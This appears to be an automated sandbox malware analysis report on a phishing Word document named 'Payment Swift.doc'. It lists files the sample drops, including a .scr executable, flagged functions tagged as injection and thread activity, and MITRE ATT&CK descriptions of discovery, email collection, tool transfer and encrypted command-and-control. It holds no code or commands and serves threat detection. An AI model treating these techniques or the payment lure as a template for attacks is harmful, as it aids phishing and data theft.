C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7CB4438-AB7B-43D3-857E-02E3B20A8674}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F049A0BE-DDAA-4F28-9F33-B6FAFB134366}.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment Swift.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\microme09255.scr

C:\Users\user\Desktop\~$yment Swift.doc

Static File Info

General

File Icon

Windows Analysis Report
Payment Swift.doc

Function 001C3D2F Relevance: 1.9, Strings: 1, Instructions: 619
COMMON

Function 001C4864 Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Function 001C4870 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Function 001C3910 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Function 001C3918 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 001C4C98 Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Function 001C3A70 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Function 001C4CA0 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 001C37F0 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Function 001C3B90 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Function 0039F360 Relevance: .5, Instructions: 545
COMMON

Function 00394518 Relevance: .3, Instructions: 266
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre